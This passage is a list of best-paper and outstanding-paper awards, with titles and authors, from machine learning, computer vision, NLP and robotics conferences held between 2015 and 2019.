Dynamic Motions: Design of Humanoid JAXON3-P and Realization of Jump Motions Kunio Kojima, Yuta Kojio, Tatsuya Ishikawa, Fumihito Sugai, Yohei Kakiuchi, Kei Okada, Masayuki Inaba # 3DV 2019 (Québec, Canada. September 16-19, 2019) **Best Paper:** Correspondence-Free Region Localization for Partial Shape Similarity via Hamiltonian Spectrum Alignment Arianna Rampini, Irene Tallini, Alex Bronstein, Maks Ovsjanikov, Emanuele Rodola # ACL 2019 (Florence, Italy. July 28 - August 2, 2019) **Best Short Paper:** Do you know that Florence is packed with visitors? Evaluating state-of-the-art models of speaker commitment Nanjiang Jiang, Marie-Catherine de Marneffe **Best Long Paper:** Bridging the Gap between Training and Inference for Neural Machine Translation Wen Zhang, Yang Feng, Fandong Meng, Di You Qun Liu **Outstanding Paper:** Emotion-Cause Pair Extraction: A New Task to Emotion Analysis in Texts Rui Xia, Zixiang Ding A Simple Theoretical Model of Importance for Summarization Maxime Peyrard Transferable Multi-Domain State Generator for Task-Oriented Dialogue Systems Chien-Sheng Wu, Andrea Madotto, Ehsan Hosseini-Asl, Caiming Xiong, Richard Socher, Pascale Fung We need to talk about standard splits Kyle Gorman, Steven Bedrick Zero-shot Word Sense Disambiguation using Sense Definition Embeddings Sawan Kumar, Sharmistha Jat, Karan Saxena, Partha Talukdar **Best Demonstration Paper:** OpenKiwi: An Open Source Framework for Quality Estimation Fabio Kepler, Jonay Trenous, Marcos Treviso, Miguel Vera, André F. T. Martins # RSS 2019 (Freiburg, Germany. June 22-26, 2019) **Best Paper:** A Magnetically-Actuated Untethered Jellyfish-Inspired Soft Milliswimmer Ziyu Ren, Tianlu Wang, Wenqi Hu, Metin Sitti **Best Student Paper:** An Online Learning Approach to Model Predictive Control Nolan Wagener, Ching-an Cheng, Jacob Sacks, Byron Boots **Best Systems Paper:** Learning to Throw Arbitrary Objects with Residual Physics Andy Zeng, Shuran Song, Johnny Lee, Alberto Rodriguez, Thomas A. Funkhouser # CVPR 2019 (Long Beach, USA. June 16-20, 2019) **Best Paper:** A Theory of Fermat Paths for Non-Line-of-Sight Shape Reconstruction Shumian Xin, Sotiris Nousias, Kyros Kutulakos, Aswin Sankaranarayanan, Srinivasa G. Narasimhan, Ioannis Gkioulekas **Best Student Paper:** Reinforced Cross-Modal Matching and Self-Supervised Imitation Learning for Vision-Language Navigation Xin Wang, Qiuyuan Huang, Asli Celikyilmaz, Jianfeng Gao, Dinghan Shen, Yuan-Fang Wang, William Yang Wang, Lei Zhang **Retrospective Most Impactful Paper from CVPR 2009:** ImageNet: A large-scale hierarchical image database Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, Li Fei-Fei # ICML 2019 (Long Beach, USA. June 9-15, 2019) **Best Paper:** Challenging Common Assumptions in the Unsupervised Learning of Disentangled Representations Francesco Locatello, Stefan Bauer, Mario Lucic, Gunnar Rätsch, Sylvain Gelly, Bernhard Schölkopf, Olivier Bachem Rates of Convergence for Sparse Variational Gaussian Process Regression David R. Burt, Carl E. Rasmussen, Mark van der Wilk # ICRA 2019 (Montreal, Canada. May 20-24, 2019) **Best Paper:** Making Sense of Vision and Touch: Self-Supervised Learning of Multimodal Representations for Contact- Rich Tasks Michelle A. Lee, Yuke Zhu, Krishnan Srinivasan, Parth Shah, Silvio Savarese, Li Fei-Fei, Animesh Garg, Jeannette Bohg **Best Student Paper:** Drift-free Roll and Pitch Estimation for High-acceleration Hopping Justin K. Yim, Eric K. Wang, Ronald Fearing **Best Automation Paper:** Robotic Orientation Control of Deformable Cells Changsheng Dai, Zhuoran Zhang, Yuchen Lu, Guanqiao Shan, Xian Wang, Qili Zhao, Yu Sun **Best Cognitive Robotics Paper:** Efficient Symbolic Reactive Synthesis for Finite-Horizon Tasks Keliang He, Andrew Wells, Lydia Kavraki, Moshe Vardi **Best Human-Robot Interaction Paper:** Gesture Recognition via Flexible Capacitive Touch Electrodes Louis Dankovich, Sarah Bergbreiter **Best Medical Robotics Paper:** Adaptive Control of Sclera Force and Insertion Depth for Safe Robot-Assisted Retinal Surgery Ali Ebrahimi, Niravkumar Patel, Changyan He, Peter Gehlbach, Marin Kobilarov, Iulian Iordachita **Best Multi-Robot Systems Paper:** Distributed Multi-Robot Formation Splitting and Merging in Dynamic Environments Hai Zhu, Jelle Juhl, Laura Ferranti, Javier Alonso-Mora **Best Robot Manipulation Paper:** Shallow-Depth Insertion: Peg in Shallow Hole through Robotic In-Hand Manipulation Chung Hee Kim, Jungwon Seo **Best Robot Vision Paper:** Geo-Supervised Visual Depth Prediction Xiaohan Fei, Alex Wong, Stefano Soatto **Best Service Robotics Paper:** Multi-Robot Region-of-Interest Reconstruction with Dec-MCTS Fouad Sukkar, Graeme Best, Chanyeol Yoo, Robert Fitch **Best Unmanned Aerial Vehicles Paper:** Design and Control of a Passively Morphing Quadcopter Nathan Bucki, Mark Wilfried Mueller # ICLR 2019 (New Orleans, USA. May 6-9, 2019) **Best Paper:** Ordered Neurons: Integrating Tree Structures into Recurrent Neural Networks Yikang Shen, Shawn Tan, Alessandro Sordoni, Aaron Courville The Lottery Ticket Hypothesis: Finding Sparse, Trainable Neural Networks Jonathan Frankle, Michael Carbin # AAAI 2019 (Honolulu, USA. January 27 - February 1, 2019) **Outstanding Paper:** How to Combine Tree-Search Methods in Reinforcement Learning Yonathan Efroni, Gal Dalal, Bruno Scherrer, Shie Mannor **Outstanding Student Paper:** Zero Shot Learning for Code Education: Rubric Sampling with Deep Learning Inference Mike Wu, Milan Mosse, Noah Goodman, Chris Piech # IJCAI-JAIR 2019 **Best Paper:** Clause Elimination for SAT and QSAT Marijn Heule, Matti Järvisalo, Florian Lonsing, Martina Seidl, Armin Biere # NeurIPS 2018 (Montréal, Canada. December 2-8, 2018) **Best Paper:** Non-delusional Q-learning and Value-iteration Tyler Lu, Dale Schuurmans, Craig Boutilier Optimal Algorithms for Non-Smooth Distributed Optimization in Networks Kevin Scaman, Francis Bach, Sebastien Bubeck, Laurent Massoulié, Yin Tat Lee Nearly Tight Sample Complexity Bounds for Learning Mixtures of Gaussians via Sample Compression Schemes Hassan Ashtiani, Shai Ben-David, Nick Harvey, Christopher Liaw, Abbas Mehrabian, Yaniv Plan Neural Ordinary Differential Equations Tian Qi Chen, Yulia Rubanova, Jesse Bettencourt, David Duvenaud # EMNLP 2018 (Brussels, Belgium. October 31 - November 4, 2018) **Best Long Paper:** Linguistically-Informed Self-Attention for Semantic Role Labeling Emma Strubell, Patrick Verga, Daniel Andor, David Weiss, Andrew McCallum Phrase-Based & Neural Unsupervised Machine Translation Guillaume Lample, Myle Ott, Alexis Conneau, Ludovic Denoyer, Marc'Aurelio Ranzato **Best Short Paper:** How Much Reading Does Reading Comprehension Require? A Critical Investigation of Popular Benchmarks Divyansh Kaushik, Zachary C. Lipton **Best Resource Paper:** MultiWOZ — A Large-Scale Multi-Domain Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling Paweł Budzianowski, Tsung-Hsien Wen, Bo-Hsiang Tseng, Iñigo Casanueva, Stefan Ultes, Osman Ramadan, Milica Gašić # CoRL 2018 (Zürich, Switzerland. October 29-31, 2018) **Best Paper:** Dense Object Nets: Learning Dense Visual Object Descriptors By and For Robotic Manipulation Lucas Manuelli, Peter R. Florence, Russ Tedrake **Best Systems Paper:** Deep Drone Racing: Learning Agile Flight in Dynamic Environments Elia Kaufmann, Antonio Loquercio, Rene Ranftl, Alexey Dosovitskiy, Vladlen Koltun, Davide Scaramuzza QT-Opt: Scalable Deep Reinforcement Learning for Vision-Based Robotic Manipulation Julian Ibarz, Dmitry Kalashnikov, Peter Pastor, Mrinal Kalakrishnan, Deirdre Quillen, Alexander Herzog, Sergey Levine, Vincent Vanhoucke, Ethan Holly, Eric Jang, Alex Irpan **Best Presentation:** Learning over Subgoals for Efficient Navigation of Structured, Unknown Environments Gregory J. Stein, Christopher Bradley, Nicholas Roy # IROS 2018 (Madrid, Spain. October 1-5, 2018) **Best Paper:** Robust Visual-Inertial State Estimation with Multiple Odometries and Efficient Mapping on an MAV with Ultra-Wide FOV Stereo Vision M. G. Müller, F. Steidle, M. J. Schuster, P. Lutz, M. Maier, S. Stoneman, T. Tomic, W. Stürzl **Best Student Paper:** Online Temporal Calibration for Monocular Visual-Inertial Systems Tong Qin, Shaojie Shen **Best Application Paper:** Closed-Loop Single-Beacon Passive Acoustic Navigation for Low-Cost Autonomous Underwater Vehicles Nicholas R. Rypkema, Erin M. Fischell, Henrik Schmidt **Best Cognitive Robotics Paper:** Augmenting Physical Simulators with Stochastic Neural Networks: Case Study of Planar Pushing and Bouncing Anurag Ajay, Jiajun Wu, Nima Fazeli, Maria Bauza, Leslie P. Kaelbling, Joshua B. Tenenbaum, Alberto Rodriguez **Best RoboCup Paper:** Motion Decoupling and Composition via Reduced Order Model Optimization for Dynamic Humanoid Walking with CLF-QP based Active Force Control Aly Magassouba, Komei Sugiura, Hisashi Kawai **Best Novel Technology Paper for Amusement Culture:** Real-Time Dance Generation to Music for a Legged Robot Thomas Bi, Péter Fankhauser, Dario Bellicoso, Marco Hutter Hands and Faces, Fast: Mono-Camera User Detection Robust Enough to Directly Control a UAV in Flight Sepehr MohaimenianPour, Richard Vaughan **Best Safety, Security, and Rescue Robotics Paper:** Fire-Aware Planning of Aerial Trajectories and Ignitions Evan Beachly, Carrick Detweiler, Sebastian Elbaum, Brittany Duncan, Carl Hildebrandt, Dirac Twidwell, Craig Allen # ECCV 2018 (Munich, Germany. September 8-14, 2018) **Best Paper:** Implicit 3D Orientation Learning for 6D Object Detection from RGB Images M. Sundermeyer, Z. Marton, M. Durner, M. Brucker, R. Triebel # 3DV 2018 (Verona, Italy. September 5-8, 2018) **Best Paper:** Robust Fitting of Subdivision Surfaces for Smooth Shape Analysis Virginia Estellers, Frank R. Schmidt, Daniel Cremers **Best Student Paper:** Neural Body Fitting: Unifying Deep Learning and Model Based Human Pose and Shape Estimation Mohamed Omran, Christoph Lassner, Gerard Pons-Moll, Peter Gehler, Bernt Schiele # ACL 2018 (Melbourne, Australia. July 15-20, 2018) **Best Short Paper:** Know What You Don’t Know: Unanswerable Questions for SQuAD Pranav Rajpurkar, Robin Jia, Percy Liang ‘Lighter’ Can Still Be Dark: Modeling Comparative Color Descriptions Olivia Winn, Smaranda Muresan **Best Long Paper:** Finding syntax in human encephalography with beam search John Hale, Chris Dyer, Adhiguna Kuncoro, Jonathan Brennan Learning to Ask Good Questions: Ranking Clarification Questions using Neural Expected Value of Perfect Information Sudha Rao, Hal Daumé III Let’s do it “again”: A First Computational Approach to Detecting Adverbial Presupposition Triggers Andre Cianflone, Yulan Feng, Jad Kabbara, Jackie Chi Kit Cheung **Best System Demonstration Paper:** Out-of-the-box Universal Romanization Tool uroman Ulf Hermjakob, Jonathan May, Kevin Knight # ICML 2018 (Stockholm, Sweden. July 10-15, 2018) **Best Paper:** Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples Anish Athalye, Nicholas Carlini, David Wagner Delayed Impact of Fair Machine Learning Lydia Liu, Sarah Dean, Esther Rolf, Max Simchowitz, Moritz Hardt **Test of Time:** A Unified Architecture for Natural Language Processing: Deep Neural Networks with Multitask Learning Ronan Collobert, Jason Weston # RSS 2018 (Pittsburgh, USA. June 26-30, 2018) **Best Paper:** Differentiable Physics and Stable Modes for Tool-Use and Manipulation Planning Marc Toussaint, Kelsey Allen, Kevin Smith, Joshua Tenenbaum **Best Student Paper:** In-Hand Manipulation via Motion Cones Nikhil Chavan Dafle, Rachel Holladay, Alberto Rodriguez **Best Systems Paper:** Embedded High Precision Control and Corn Stand Counting Algorithms for an Ultra-Compact 3D Printed Field Robot Erkan Kayacan, Zhongzhong Zhang, Girish Chowdhary # CVPR 2018 (Salt Lake City, USA. June 18-22, 2018) **Best Paper:** Taskonomy: Disentangling Task Transfer Learning Amir Zamir, Alexander Sax, William Shen, Leonidas Guibas, Jitendra Malik, Silvio Savarese **Best Student Paper:** Total Capture: A 3D Deformation Model for Tracking Faces, Hands, and Bodies Hanbyul Joo, Tomas Simon, Yaser Sheikh **Retrospective Most Impactful Paper from CVPR 2008:** A Discriminatively Trained, Multiscale, Deformable Part Model Pedro Felzenszwalb. David McAllester, Deva Ramanan # ICRA 2018 (Brisbane, Australia. May 21-25, 2018) **Best Paper:** Compact Design of a Hydraulic Driving Robot for Intra-operative MRI-guided Bilateral Stereotactic Neurosurgery Ziyan Guo, Ziyang Dong, Kit-Hang Lee, Chim Lee Cheung, Hing Choi Fu, Justin Di-Lang Ho, Haokun He, Wai Sang Poon, Tat-Ming Chan, Ka-Wai Kwok **Best Student Paper:** Design of an Autonomous Racecar: Perception, State Estimation and System Integration Miguel de la Iglesia Valls, Hubertus Franciscus Cornelis Hendrikx, Victor Reijgwart, Fabio Vito Meier, Inkyu Sa, Renaud Dubé, Abel Roman Gawel, Mathias Bürki, Roland Siegwart **Best Automation Paper:** Accurate and Adaptive In situ Fabrication of an Undulated Wall using an On-Board Visual Sensing System Manuel Lussi, Timothy Sandy, Kathrin Doerfler, Norman Hack, Fabio Gramazio, Matthias Daniel Kohler, Jonas Buchli **Best Cognitive Robotics Paper:** Social Attention: Modeling Attention in Human Crowds Anirudh Vemula, Katharina Muelling, Jean Oh **Best Human-Robot Interaction Paper:** Interactively Picking Real-World Objects with Unconstrained Spoken Language Instructions Jun Hatori, Yuta Kikuchi, Sosuke Kobayashi, Kuniyuki Takahashi, Yuta Tsuboi, Yuya Unno, Wilson Kien Ho Ko, Jethro Tan **Best Medical Robotics Paper:** A Lightweight and Efficient Portable Soft Exosuit for Paretic Ankle Assistance in Walking after Stroke Jaehyun Bae, Christopher Siviy, Michael Rouleau, Nicolas Menard, Kathleen O’Donnell, Ignacio Galiana, Maria Athanassiu, Danielle Ryan, Christine Bibeau, Lizeth Sloot, Pawel Kudzia, Terry Ellis, Louis Awad, Conor James Walsh **Best Multi-Robot Systems Paper:** Pairwise Consistent Measurement Set Maximization for Robust Multi-robot Map Merging Joshua Mangelson, Derrick Dominic, Ryan Eustice, Ram Vasudevan **Best Robot Manipulation Paper:** Decentralized Adaptive Control for Collaborative Manipulation Preston Culbertson, Mac Schwager **Best Robot Vision Paper:** Optimization Beyond the Convolution: Generalizing Spatial Relations with End-to-End Metric Learning Philipp Jund, Andreas Eitel, Nichola Abdo, Wolfram Burgard **Best Service Robotics Paper:** PRM-RL: Long-range Robotic Navigation Tasks by Combining Reinforcement Learning and Sampling-based Planning Aleksandra Faust, Oscar Alejandro Ramirez, Marek Fiser, Kenneth Oslund, Anthony Francis, James Davidson, Lydia Tapia **Best Unmanned Aerial Vehicles Paper:** Design, Modeling and Control of Aerial Robot DRAGON: Dual-rotor-embedded-multilink Robot with the Ability of Multi-deGree-of-freedom Aerial TransformatiON Moju Zhao, Tomoki Anzai, Fan Shi, Xiangyu Chen, Kei Okada, Masayuki Inaba # ICLR 2018 (Vancouver, Canada. April 30 - May 3, 2018) **Best Paper:** Continuous Adaptation via Meta-Learning in Nonstationary and Competitive Environments Maruan Al-Shedivat, Trapit Bansal, Yuri Burda, Ilya Sutskever, Igor Mordatch, Pieter Abbeel # AAAI 2018 (New Orleans, USA. February 2-7, 2018) **Outstanding Paper:** Memory-Augmented Monte Carlo Tree Search Chenjun Xiao, Jincheng Mei, and Martin Müller **Outstanding Student Paper:** Counterfactual Multi-Agent Policy Gradients Jakob N. Foerster, Gregory Farquhar, Triantafyllos Afouras, Nantas Nardelli, Shimon Whiteson # NeurIPS 2017 (Long Beach, USA. December 4-9, 2017) **Best Paper:** Safe and Nested Subgame Solving for Imperfect-Information Games Noam Brown, Tuomas Sandholm Variance-based Regularization with Convex Objectives Hongseok Namkoong, John Duchi A Linear-Time Kernel Goodness-of-Fit Test Wittawat Jitkrittum, Wenkai Xu, Zoltan Szabo, Kenji Fukumizu, Arthur Gretton **Test of Time:** Random Features for Large-Scale Kernel Machines Ali Rahimi, Benjamen Recht # ICCV 2017 (Venice, Italy. October 22-29, 2017) **Best Paper:** Mask R-CNN K. He, G. Gkioxari, P. Dollar, R. Girshick **Best Student Paper:** Focal Loss for Dense Object Detection T.-Y. Lin, P. Goyal, R. Girshick, K. He, P. Dollar # 3DV 2017 (Qingdao, China. October 10-12, 2017) **Best Paper:** Learning Human Motion Models for Long-term Predictions Partha Ghosh, Jie Song, Emre Aksan, Otmar Hilliges **Best Student Paper:** Sparsity Invariant CNNs Jonas Uhrig, Nick Schneider, Lukas Schneider, Thomas Brox, Andreas Geiger # IROS 2017 (Vancouver, Canada. September 24-28, 2017) **Best Paper:** Repetitive extreme-acceleration (14-g) spatial jumping with Salto-1P **Best Student Paper:** Socially Aware Motion Planning with Deep Reinforcement Learning **Best Application Paper:** A Multi-Track Elevator System for E-Commerce Fulfillment Centers Rachel M. Hoffman, H. Harry Asada **Best Safety, Security, and Recue Robotics Paper:** Development of a 20-m-long Giacometti Arm with Balloon Body Based on Kinematic Model with Air Resistance Masashi Takeichi, Koichi Suzumori, Gen Endo, Hiroyuki Nabae **Best Cognitive Robotics Paper:** Task-oriented Grasping with Semantic and Geometric Scene Understanding Renaud Detry, Jeremie Papon Larry Matthies **Best RoboCup Paper:** Online Visual Robot Tracking and Identification using Deep LSTM Networks Hafez Farazi, Sven Behnke **Best Novel Technology Paper for Amusement Culture:** Fabrication, Modeling, and Control of Plush Robots James M. Bern, Grace Kumagai, Stelian Coros # EMNLP 2017 (Copenhagen, Denmark. September 7-11, 2017) **Best Long Paper:** Men Also Like Shopping: Reducing Gender Bias Amplification using Corpus-level Constraints Jieyu Zhao, Tianlu Wang, Mark Yatskar, Vicente Ordonez, Kai-Wei Chang Depression and Self-Harm Risk Assessment in Online Forums Andrew Yates, Arman Cohan, Nazli Goharian **Best Short Paper:** Natural Language Does Not Emerge ‘Naturally’ in Multi-Agent Dialog Satwik Kottur, José Moura, Stefan Lee, Dhruv Batra **Best Resource Paper:** Bringing Structure into Summaries: Crowdsourcing a Benchmark Corpus of Concept Maps Tobias Falke, Iryna Gurevych # ICML 2017 (Sydney, Australia. August 6-11, 2017) **Best Paper:** Understanding Black-box Predictions via Influence Functions Pang Wei Koh, Percy Liang **Test of Time:** Combining Online and Offline Knowledge in UCT Sylvain Gelly, David Silver # ACL 2017 (Vancouver, Canada. July 30 - August 4, 2017) **Best Paper:** Probabilistic Typology: Deep Generative Models of Vowel Inventories Ryan Cotterell, Jason Eisner # CVPR 2017 (Honolulu, USA. July 21-26, 2017) **Best Paper:** Densely Connected Convolutional Networks Gao Huang, Zhuang Liu, Laurens van der Maaten, Kilian Q. Weinberger Learning from Simulated and Unsupervised Images through Adversarial Training Ashish Shrivastava, Tomas Pfister, Oncel Tuzel, Joshua Susskind, Wenda Wang, Russell Webb **Best Student Paper:** Computational Imaging on the Electric Grid Mark Sheinin, Yoav Y. Schechner, Kiriakos N. Kutulakos **Retrospective Most Impactful Paper from CVPR 2007:** Object Retrieval with Large Vocabularies and Fast Spatial Matching James Philbin, Ondrej Chum, Michael Isard, Josef Sivic, Andrew Zisserman Accurate, Dense, and Robust Multi-View Stereopsis Y. Furukawa, J. Ponce # RSS 2017 (Cambridge, USA. July 12-16, 2017) **Best Paper:** Asymptotically Optimal Design of Piecewise Cylindrical Robots using Motion Planning Cenk Baykal, Ron Alterovitz **Best Student Paper:** Improving Slip Prediction on Mars Using Thermal Inertia Measurements Christopher Cunningham, Issa Nesnas, William Whittaker **Best Systems Paper:** XPose: Reinventing User Interaction with Flying Cameras Ziquan Lan, Mohit Shridhar, David Hsu, Shengdong Zhao # ICRA 2017 (Singapore, Singapore. May 29 - June 3, 2017) **Best Paper:** Probabilistic Data Association for Semantic SLAM Sean Bowman, Nikolay Atanasov, Kostas Daniilidis, George J. Pappas **Best Student Paper:** Autonomous Robotic Stone Stacking with Online Next Best Object Target Pose Planning Fadri Furrer, Martin Wermelinger, Hironori Yoshida, Fabio Gramazio, Matthias Daniel Kohler, Roland Siegwart, Marco Hutter **Best Automation Paper:** UAV-Based Crop and Weed Classification for Smart Farming Philipp Lottes, Raghav Khanna, Johannes Pfeifer, Roland Siegwart, Cyrill Stachniss **Best Cognitive Robotics Paper:** Learning to Guide Task and Motion Planning Using Score-Space Representation Beomjoon Kim, Leslie Kaelbling, Tomas Lozano-Perez **Best Human-Robot Interaction Paper:** Development of a Block Machine for Volleyball Attack Training Kosuke Sato, Keita Watanabe, Shuichi Mizuno, Masayoshi Manabe, Hiroaki Yano, Hiroo Iwata **Best Medical Robotics Paper:** First Demonstration of Simultaneous Localization and Propulsion of a Magnetic Capsule in a Lumen using a Single Rotating Magnet Katie Popek, Tucker Hermans, Jake Abbott **Best Multi-Robot Systems Paper:** The Robotarium: A Remotely Accessible Swarm Robotics Research Testbed Daniel Pickem, Paul Glotfelter, Li Wang, Mark Mote, Aaron Ames, Eric Feron, Magnus Egerstedt **Best Robot Manipulation Paper:** Analyzing Achievable Stiffness Control Bounds of Robotic Hands with Compliantly Coupled Finger Joints Prashant Rao, Gray Thomas, Luis Sentis, Ashish Deshpande **Best Robot Vision Paper:** Self-supervised Learning of Dense Visual Descriptors Tanner Schmidt, Richard Newcombe, Dieter Fox **Best Service Robotics Paper:** High-Precision Microinjection of Microbeads into C. Elegans Trapped in a Suction Microchannel Masahiro Nakajima, Yuki Ayamura, Masaru Takeuchi, Naoki Hisamoto, Strahil Pastuhov, Yasuhisa Hasegawa, Toshio Fukuda, Qiang Huang # ICLR 2017 (Toulon, France. April 24-26, 2017) **Best Paper:** Making Neural Programming Architectures Generalize via Recursion Jonathon Cai, Richard Shin, Dawn Song Understanding deep learning requires rethinking generalization Chiyuan Zhang, Samy Bengio, Moritz Hardt, Benjamin Recht, Oriol Vinyals Semi-supervised Knowledge Transfer for Deep Learning from Private Training Data Nicolas Papernot, Martín Abadi, Úlfar Erlingsson, Ian Goodfellow, Kunal Talwar # AAAI 2017 (San Francisco, USA. February 4-9, 2017) **Outstanding Paper:** Label-Free Supervision of Neural Networks with Physics and Domain Knowledge Russell Stewart, Stefano Ermon **Outstanding Student Paper:** The Option-Critic Architecture Pierre-Luc Bacon, Jean Harb, Doina Precup # WAFR 2016 (San Francisco, USA. December 18-20, 2016) **Best Paper:** A Certifiably Correct Algorithm for Synchronization over the Special Euclidean Group David Rosen, Luca Carlone, Afonso Bandeira, John Leonard # NeurIPS 2016 (Barcelona, Spain. December 5-11, 2016) **Best Paper:** Value Iteration Networks Aviv Tamar, Yi Wu, Garrett Thomas, Sergey Levine, Pieter Abbeel **Best Student Paper:** Matrix Completion has No Spurious Local Minimum Rong Ge, Jason Lee, Tengyu Ma # EMNLP 2016 (Austin, USA. November 1-5, 2016) **Best Paper:** Improving Information Extraction by Acquiring External Evidence with Reinforcement Learning Karthik Narasimhan, Adam Yala, Regina Barzilay Global Neural CCG Parsing with Optimality Guarantees Kenton Lee, Mike Lewis, Luke Zettlemoyer **Best Short Paper:** Learning a Lexicon and Translation Model from Phoneme Lattices Oliver Adams, Graham Neubig, Trevor Cohn, Steven Bird, Quoc Truong Do, Satoshi Nakamura **Best Resource Paper:** SQuAD: 100,000+ Questions for Machine Comprehension of Text Pranav Rajpurkar, Jian Zhang, Konstantin Lopyrev, Percy Liang # 3DV 2016 (Stanford, USA. October 25-28, 2016) **Best Paper:** Depth from Gradients in Dense Light Fields for Object Reconstruction Kaan Yucer, Changil Kim, Alexander Sorkine-Hornung, Olga Sorkine-Hornung # IROS 2016 (Daejeon, Korea. October 9-14, 2016) **Best Paper:** ANYmal - a Highly Mobile and Dynamic Quadrupedal Robot Marco Hutter, Christian Gehring, Dominic Jud, Andreas Lauber, Carmine Dario Bellicoso, Vassilios Tsounis, Jemin Hwangbo, Karen Bodie, Péter Fankhauser, Michael Bloesch, Remo Diethelm, Samuel Bachmann, Amir Melzer, Mark Hoepflinger **Best Student Paper:** Watch This: Scalable Cost-Function Learning for Path Planning in Urban Environments Markus Wulfmeier, Dominic Zeng Wang, Ingmar Posner **Best Application Award Paper:** Skeletal Structure with Artificial Perspiration for Cooling by Latent Heat for Musculoskeletal Humanoid Kengoro Toyotaka Kozuki, Hirose Toshinori, Takuma Shirai, Shinsuke Nakashima, Yuki Asano, Yohei Kakiuchi, Kei Okada, Masayuki Inaba **Best Safety, Security, and Recue Robotics Paper:** A Palm for a Rock Climbing Robot Based on Dense Arrays of Micro-Spines Shiquan Wang, Hao Jiang, Mark Cutkosky **Best Cognitive Robotics Paper:** Predicting Actions to Act Predictably: Cooperative Partial Motion Planning with Maximum Entropy Models Mark Pfeiffer, Ulrich Schwesinger, Hannes Sommer, Enric Galceran, Roland Siegwart **Best RoboCup Paper:** Multi-Robot Search for a Moving Target: Integrating World Modeling, Task Assignment and Context Francesco Riccio, Emanuele Borzi, Guglielmo Gemignani, Daniele Nardi **Best Novel Technology Paper for Amusement Culture:** Robot Artist for Colorful Picture Painting with Visual Control System Ren Luo, Ming-Jyun Hong, Ping-Chang Chung # ECCV 2016 (Amsterdam, Netherlands. October 8-16, 2016) **Best Paper:** Real-Time 3D Reconstruction and 6-DoF Tracking with an Event Camera H. Kim, S. Leutenegger, A. J. Davison **Best Student Paper:** Focal Flow: Measuring Distance and Velocity with Defocus and Differential Motion Emma Alexander, Qi Guo, Sanjeev Koppal, Steven Gortler, Todd Zickler # ACL 2016 (Berlin, Germany. August 7-12, 2016) **Best Paper:** Finding Non-Arbitrary Form-Meaning Systematicity Using String-Metric Learning for Kernel Regression E.Dario Gutiérrez, Roger Levy, Benjamin Bergen # RSS 2016 (Ann Arbor, USA. July 18-22, 2016) **Best Paper:** Efficient Grounding of Abstract Spatial Concepts for Natural Language Interaction with Robot Manipulators Rohan Paul, Jacob Arkin, Nicholas Roy and Thomas M. Howard **Best Student Paper:** Coordinated multi-arm motion planning: Reaching for moving objects in the face of uncertainty Seyed Sina Mirrazavi Salehian, Nadia Figueroa and Aude Billard **Best Systems Paper:** An End-To-End System for Accomplishing Tasks with Modular Robots Gangyuan Jing, Tarik Tosun, Mark Yim, Hadas Kress-Gazit Lessons from the Amazon Picking Challenge: Four Aspects of Building Robotic Systems Clemens Eppner, Sebastian Höfer, Rico Jonschkowski, Roberto Martín-Martín, Arne Sieverling, Vincent Wall, Oliver Brock # CVPR 2016 (Las Vegas, USA. June 26 - July 1, 2016) **Best Paper:** Deep Residual Learning for Image Recognition Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun **Best Student Paper:** Structural-RNN: Deep Learning on Spatio-Temporal Graphs Ashesh Jain, Amir R. Zamir, Silvio Savarese, Ashutosh Saxena **Retrospective Most Impactful Paper from CVPR 2006:** Beyond Bags of Features: Spatial Pyramid Matching for Recognizing Natural Scene Categories S. Lazebnik, C. Schmid, J. Ponce Scalable Recognition with a Vocabulary Tree D. Nister, H. Stewenius # ICML 2016 (New York, USA. June 19-24, 2016) **Best Paper:** Dueling Network Architectures for Deep Reinforcement Learning Ziyu Wang, Tom Schaul, Matteo Hessel, Hado Hasselt, Marc Lanctot, Nando Freitas Pixel Recurrent Neural Networks Aaron Van den Oord, Nal Kalchbrenner, Koray Kavukcuoglu Ensuring Rapid Mixing and Low Bias for Asynchronous Gibbs Sampling Christopher De Sa, Chris Re, Kunle Olukotun **Test of Time:** Dynamic Topic Models David M. Blei, John D. Lafferty # ICRA 2016 (Stockholm, Sweden. May 16-21, 2016) **Best Paper:** A Convex Polynomial Force-Motion Model for Planar Sliding: Identification and Application Jiaji Zhou, Robert Paolini, James Bagnell, Matthew T. Mason **Best Student Paper:** Supersizing Self-supervision: Learning to Grasp from 50K Tries and 700 Robot Hours Lerrel Joseph Pinto, Abhinav Gupta **Best Automation Paper:** Beyond Layers: A 3D-Aware Toolpath Algorithm for Fused Filament Fabrication Samuel Lensgraf, Ramgopal Mettu **Best Human-Robot Interaction Paper:** A Highly Sensitive Dual Mode Tactile Proximity Sensor Using Carbon Microcoils for Robotic Applications Hyo Seung Han, Junwoo Park, Tien Dat Nguyen, Uikyum Kim, Canh Toan Nguyen, Hoa Phung, Hyouk Ryeol Choi **Best Medical Robotics Paper:** Image-Based Robotic System for Enhanced Minimally Invasive Intra-Articular Fracture Surgeries Giulio Dagnino, Ioannis Georgilas, Paul Köhler, R. Atkins, Sanja Dogramadzi **Best Robot Manipulation Paper:** Optimal Control with Learned Local Models: Application to Dexterous Manipulation Vikash Kumar, Emanuel Todorov, Sergey Levine **Best Robot Vision Paper:** Multi-Type Activity Recognition in Robot-Centric Scenarios Ilaria Gori, J.K. Aggarwal, Larry Matthies, Michael S. Ryoo # ICLR 2016 (San Juan, Puerto Rico. May 2-4, 2016) **Best Paper:** Neural Programmer-Interpreters Scott Reed, Nando de Freitas Deep Compression: Compressing Deep Neural Networks with Pruning, Trained Quantization and Huffman Coding Song Han, Huizi Mao, Bill Dally # AAAI 2016 (Phoenix, USA. February 12-17, 2016) **Outstanding Paper:** Bidirectional Search That Is Guaranteed to Meet in the Middle Robert C. Holte, Ariel Felner, Guni Sharon, Nathan R. Sturtevant **Outstanding Student Paper:** Toward a Taxonomy and Computational Models of Abnormalities in Images Babak Saleh, Ahmed Elgammal, Jacob Feldman, Ali Farhadi # ICCV 2015 (Santiago, Chile. December 11-18, 2015) **Best Paper:** Deep Neural Decision Forests P. Kontschieder, M. Fiterau, A. Criminisi, S. Rota Bulo # NeurIPS 2015 (Montréal, Canada. December 7-12, 2015) **Best Paper:** Competitive Distribution Estimation: Why is Good-Turing Good Alon Orlitsky, Ananda Suresh Fast Convergence of Regularized Learning in Games Vasilis Syrgkanis, Alekh Agarwal, Haipeng Luo, Robert Schapire # 3DV 2015 (Lyon, France. October 19-22, 2015) **Best Paper:** Towards Probabilistic Volumetric Reconstruction using Ray Potentials Ali Ulusoy, Andreas Geiger, Michael Black # 